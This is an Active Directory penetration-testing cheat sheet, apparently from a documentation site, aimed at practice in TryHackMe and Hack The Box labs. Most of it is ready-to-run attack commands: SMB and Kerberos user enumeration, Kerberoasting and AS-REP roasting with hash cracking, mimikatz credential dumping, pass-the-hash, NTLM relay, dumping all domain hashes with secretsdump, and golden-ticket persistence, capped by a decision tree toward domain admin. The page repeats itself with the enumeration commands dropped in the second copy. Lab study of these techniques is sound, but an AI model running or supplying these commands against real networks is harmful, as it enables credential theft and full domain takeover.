Quick Guide To AD Pentesting

🔥 Step-by-Step AD Pentesting Cheat Sheet

1️⃣ Enumeration (Always Start Here!)

Your goal: Find Users, Computers, Groups, and AD Misconfigurations.

🔹 Basic Enumeration (No Credentials) ✅ nmap -p 88,135,139,389,445,464,593,636,3268,3389 --script=ldap* --script=smb* <target> ✅ smbclient -L //target -N → Check SMB Shares ✅ crackmapexec smb <target> → Check SMB, Users, and Shares ✅ kerbrute userenum -d domain.com --dc <DC-IP> usernames.txt → Find Valid Users

🔹 Detailed Enumeration (With Credentials) ✅ bloodhound-python -u user -p pass -d domain.com -c All -dc-ip <DC-IP> → Full AD Mapping ✅ rpcclient -U 'user%pass' <DC-IP> → Query AD Info ✅ net group "Domain Admins" /domain → Check Domain Admins ✅ net user /domain → List All Users ✅ crackmapexec ldap <DC-IP> -u user -p pass --asreproast → Check for AS-REP Roastable Accounts

📌 If You Find Null SMB Shares or Weak Users → Move to Exploitation.

2️⃣ Exploitation (Privilege Escalation & Lateral Movement)

Your goal: Escalate Privileges from a Low-Level User.

🔹 Kerberoasting (If Kerberos Enabled) ✅ GetUserSPNs.py -dc-ip <DC-IP> domain/user:pass -request ✅ john --wordlist=rockyou.txt hash.txt

🔹 AS-REP Roasting (If User Doesn’t Require Pre-Auth) ✅ GetNPUsers.py -dc-ip <DC-IP> -usersfile users.txt domain/ -format hashcat ✅ hashcat -m 18200 hash.txt rockyou.txt --force

🔹 Pass-the-Hash / Pass-the-Ticket (Lateral Movement) ✅ mimikatz.exe → sekurlsa::logonpasswords → Steal Passwords ✅ psexec.py domain/user@target -hashes LM:NT

🔹 NTLM Relay Attacks (If SMB Signing is Disabled) ✅ ntlmrelayx.py -t smb://target --smb2support

📌 If you get a higher-privilege account → Use It for Full Compromise.

3️⃣ Full Domain Compromise (Domain Admin Access!)

Your goal: Get Domain Admin and Dump All Passwords.

🔹 Check if You Are a Domain Admin ✅ whoami /groups ✅ net group "Domain Admins" /domain

🔹 Dump All AD Hashes (If DA Access) ✅ secretsdump.py -dc-ip <DC-IP> domain/admin:password@target

🔹 Golden Ticket Attack (Persistence) ✅ mimikatz.exe → kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-XXXXX /krbtgt:HASH /ptt

📌 Once You Get DA → You Have Fully Compromised the Domain!

🔥 How to Know What to Use in a Lab? (Decision-Making Tree)

✅ 1. Do I have credentials?

❌ No → Start with Enumeration
✅ Yes → Use BloodHound & CrackMapExec

✅ 2. Can I Kerberoast / AS-REP Roast?

✅ Yes → Extract Hashes & Crack Them
❌ No → Try Lateral Movement

✅ 3. Do I have SMB, LDAP, or Kerberos Misconfigurations?

✅ Yes → Exploit Using NTLM Relay, Pass-the-Hash, or Kerberos Attacks
❌ No → Look for Local Privilege Escalation on Workstations

✅ 4. Do I have Domain Admin access?

✅ Yes → Dump Hashes & Maintain Access
❌ No → Pivot to Another User or Machine

🔥 Next Steps for You

Use this step-by-step method in any AD lab.
Start practicing each attack individually on TryHackMe (THM) & Hack The Box (HTB).
Use BloodHound to visualize attack paths (this helps a lot).
If stuck, Google specific errors & read writeups (everyone does this, even pros).

Previous0. AD Pentest NextActive Directory: Full Attack Name

Last updated 12 days ago

Quick Guide To AD Pentesting

🔥 Step-by-Step AD Pentesting Cheat Sheet

1️⃣ Enumeration (Always Start Here!)

Your goal: Find Users, Computers, Groups, and AD Misconfigurations.

📌 If You Find Null SMB Shares or Weak Users → Move to Exploitation.

2️⃣ Exploitation (Privilege Escalation & Lateral Movement)

Your goal: Escalate Privileges from a Low-Level User.

🔹 Kerberoasting (If Kerberos Enabled) ✅ GetUserSPNs.py -dc-ip <DC-IP> domain/user:pass -request ✅ john --wordlist=rockyou.txt hash.txt

🔹 AS-REP Roasting (If User Doesn’t Require Pre-Auth) ✅ GetNPUsers.py -dc-ip <DC-IP> -usersfile users.txt domain/ -format hashcat ✅ hashcat -m 18200 hash.txt rockyou.txt --force

🔹 Pass-the-Hash / Pass-the-Ticket (Lateral Movement) ✅ mimikatz.exe → sekurlsa::logonpasswords → Steal Passwords ✅ psexec.py domain/user@target -hashes LM:NT

🔹 NTLM Relay Attacks (If SMB Signing is Disabled) ✅ ntlmrelayx.py -t smb://target --smb2support

📌 If you get a higher-privilege account → Use It for Full Compromise.

3️⃣ Full Domain Compromise (Domain Admin Access!)

Your goal: Get Domain Admin and Dump All Passwords.

🔹 Check if You Are a Domain Admin ✅ whoami /groups ✅ net group "Domain Admins" /domain

🔹 Dump All AD Hashes (If DA Access) ✅ secretsdump.py -dc-ip <DC-IP> domain/admin:password@target

🔹 Golden Ticket Attack (Persistence) ✅ mimikatz.exe → kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-XXXXX /krbtgt:HASH /ptt

📌 Once You Get DA → You Have Fully Compromised the Domain!

🔥 How to Know What to Use in a Lab? (Decision-Making Tree)

✅ 1. Do I have credentials?

❌ No → Start with Enumeration
✅ Yes → Use BloodHound & CrackMapExec

✅ 2. Can I Kerberoast / AS-REP Roast?

✅ Yes → Extract Hashes & Crack Them
❌ No → Try Lateral Movement

✅ 3. Do I have SMB, LDAP, or Kerberos Misconfigurations?

✅ Yes → Exploit Using NTLM Relay, Pass-the-Hash, or Kerberos Attacks
❌ No → Look for Local Privilege Escalation on Workstations

✅ 4. Do I have Domain Admin access?

✅ Yes → Dump Hashes & Maintain Access
❌ No → Pivot to Another User or Machine

🔥 Next Steps for You

Use this step-by-step method in any AD lab.
Start practicing each attack individually on TryHackMe (THM) & Hack The Box (HTB).
Use BloodHound to visualize attack paths (this helps a lot).
If stuck, Google specific errors & read writeups (everyone does this, even pros).

Previous0. AD Pentest NextActive Directory: Full Attack Name

Last updated 12 days ago